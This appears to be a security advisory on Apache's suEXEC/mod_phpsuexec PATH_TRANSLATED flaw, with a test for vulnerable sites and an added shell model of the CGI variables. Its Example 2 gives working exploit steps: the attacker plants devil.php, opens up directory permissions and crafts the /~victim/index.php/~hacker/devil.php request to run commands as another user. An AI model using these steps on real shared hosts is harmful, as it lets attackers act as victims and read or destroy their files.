suEXEC mod_phpsuexec PATH_TRANSLATED Vulnerability
Any local user on the machine can execute arbitrary commands as any other user who owns a .php file served by the web server.
Although slightly involved to exploit, this is a very severe vulnerability.
If you are the administrator, you can eliminate this vulnerability by upgrading to
Apache 1.3.31 or later or by switching back to mod_php (option 1).
If you are a user, delete all .php files you own immediately. Even a completely empty (zero-byte)
file called blank.php is enough to let everyone on the machine execute whatever they want as you:
the contents of your file are never run, only its ownership matters. If you really must keep a
PHP script somewhere on your site, make frequent backups of everything, including all of your
databases, because everyone on the machine can read, modify and destroy all of your files and
directories. Notify your host immediately.
If you host with A-Squad, you'll be safe.
Example 1: A quick way to verify whether you are vulnerable is to follow these steps:
- Create a file called simple.php containing:
  <?php echo "PHP Works."; ?>
- Make sure it works in the browser:
  http://www.yoursite.com/simple.php
- Now request it again with extra path information appended after the script name:
  http://www.yoursite.com/simple.php/foo
- If it still runs, you're safe. If it fails with a 404 error or prints
  "No input file specified", then you are vulnerable: the trailing /foo became PATH_INFO,
  and PHP tried to run the file that PATH_TRANSLATED points at instead of simple.php itself.
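The same check, scripted. This is an added example and not part of the advisory: classify_probe applies the rule above to an HTTP status code and response body, and probe_site fetches simple.php/foo with curl (it assumes simple.php is already in place and that curl is installed). The sample status/body pairs in the comments are constructed, not captured from a real server.

```shell
#!/bin/sh
# Added example (not from the advisory): automate the simple.php/foo check.

# classify_probe STATUS BODY
# Decision rule from the advisory: the script still producing its own output
# means PATH_INFO is handled normally (safe); a 404, or PHP complaining
# "No input file specified", means PATH_TRANSLATED was used as the script
# file (vulnerable). Anything else is reported as unknown rather than guessed.
classify_probe() {
  status="$1"
  body="$2"
  case "$status" in
    404) echo vulnerable; return 0 ;;
  esac
  case "$body" in
    *"No input file specified"*) echo vulnerable; return 0 ;;
    *"PHP Works."*)              echo safe;       return 0 ;;
  esac
  echo unknown
}

# probe_site BASE_URL
# Live check (needs network access): requests BASE_URL/simple.php/foo and
# classifies the answer. Assumes simple.php from the advisory is deployed.
probe_site() {
  base="$1"
  tmp=$(mktemp) || return 1
  status=$(curl -s -o "$tmp" -w '%{http_code}' "$base/simple.php/foo")
  body=$(cat "$tmp")
  rm -f "$tmp"
  classify_probe "$status" "$body"
}

# Constructed sample responses, for illustration:
#   classify_probe 200 'PHP Works.'                -> safe
#   classify_probe 404 ''                          -> vulnerable
#   classify_probe 200 'No input file specified'   -> vulnerable
#
# Live usage: probe_site http://www.yoursite.com
```

A 404 is treated as vulnerable without looking at the body because on an affected server the request never reaches simple.php at all; a healthy server would instead serve simple.php and expose /foo to it as PATH_INFO.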
Example 2: Need more proof? If the hacker user wants to execute arbitrary commands as
the victim user, he can follow these steps:
- Find any .php file owned by the victim:
  find ~victim/public_html -name \*.php
  or
  grep /victim/.*.php /usr/local/apache/logs/error_log
  or, easiest of all, simply click around on the victim's web site until a .php link is
  found. Let's say there exists a file called /home/victim/public_html/index.php.
- Create a PHP script called /home/hacker/public_html/devil.php containing arbitrary
  PHP code:
  <?php echo `id` ?>
- Disable WEBROOT protection for the hacker user:
  chmod a+x ~ ~/public_html
- Now the web server, running as the victim, has permission to traverse the hacker's
  directories and read (and execute) the hacker-owned script.
- Exploit the vulnerability:
  http://IP.AD.RE.SS/~victim/index.php/~hacker/devil.php
  suexec picks the user from the /~victim/ part of the request, but PHP picks the file
  to run from PATH_TRANSLATED, which maps /~hacker/devil.php to the hacker's script.
  The result is that devil.php runs as the victim user.
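To make the mismatch above concrete, here is an added example (not from the advisory) that models how the CGI variables are derived for such a request. It assumes a UserDir layout of /home/<user>/public_html and a DocumentRoot of /usr/local/apache/htdocs; both paths, and the fallback user "nobody", are assumptions for the example, not facts from the page.

```shell
#!/bin/sh
# Added example (not from the advisory): model the CGI variables Apache 1.3
# derives for /~victim/index.php/~hacker/devil.php, to show why suexec and
# php-cgi disagree about which user and which file are involved.
# Assumed layout: UserDir public_html under /home, DocumentRoot below.

DOCROOT=/usr/local/apache/htdocs   # assumed for this example

# map_uri URI -> filesystem path, applying the UserDir rule for /~user/...
map_uri() {
  case "$1" in
    /~*)
      rest=${1#/~}
      user=${rest%%/*}
      tail=${rest#"$user"}
      echo "/home/$user/public_html$tail" ;;
    *)
      echo "$DOCROOT$1" ;;
  esac
}

# owner_for_uri URI -> the user suexec switches to for a /~user/ request
owner_for_uri() {
  case "$1" in
    /~*) rest=${1#/~}; echo "${rest%%/*}" ;;
    *)   echo nobody ;;   # non-UserDir request: server's own user (assumed name)
  esac
}

# script_name URI -> the request path up to and including the first .php segment
script_name() {
  case "$1" in
    *.php/*) echo "${1%%.php/*}.php" ;;
    *)       echo "$1" ;;
  esac
}

# path_info URI -> whatever follows the script name (empty when nothing does)
path_info() {
  s=$(script_name "$1")
  echo "${1#"$s"}"
}

# file_php_cgi_runs URI -> the file php-cgi opens on an unpatched server:
# PATH_TRANSLATED when PATH_INFO is present, otherwise the script itself.
file_php_cgi_runs() {
  pi=$(path_info "$1")
  if [ -n "$pi" ]; then
    map_uri "$pi"
  else
    map_uri "$(script_name "$1")"
  fi
}

# show_cgi_env URI -> prints the variables side by side with the suexec user
show_cgi_env() {
  uri="$1"
  sn=$(script_name "$uri")
  pi=$(path_info "$uri")
  printf 'SCRIPT_NAME=%s\n'     "$sn"
  printf 'SCRIPT_FILENAME=%s\n' "$(map_uri "$sn")"
  printf 'PATH_INFO=%s\n'       "$pi"
  [ -n "$pi" ] && printf 'PATH_TRANSLATED=%s\n' "$(map_uri "$pi")"
  printf 'suexec runs as: %s\n' "$(owner_for_uri "$sn")"
  printf 'php-cgi executes: %s\n' "$(file_php_cgi_runs "$uri")"
}

show_cgi_env /~victim/index.php/~hacker/devil.php
```

For the exploit URL the model yields SCRIPT_FILENAME=/home/victim/public_html/index.php and PATH_TRANSLATED=/home/hacker/public_html/devil.php: suexec uses the first path's owner, while php-cgi opens the second file. That is the whole bug, and it is also why a plain /~victim/index.php request (no PATH_INFO) behaves normally and why an empty index.php is just as dangerous as a real one.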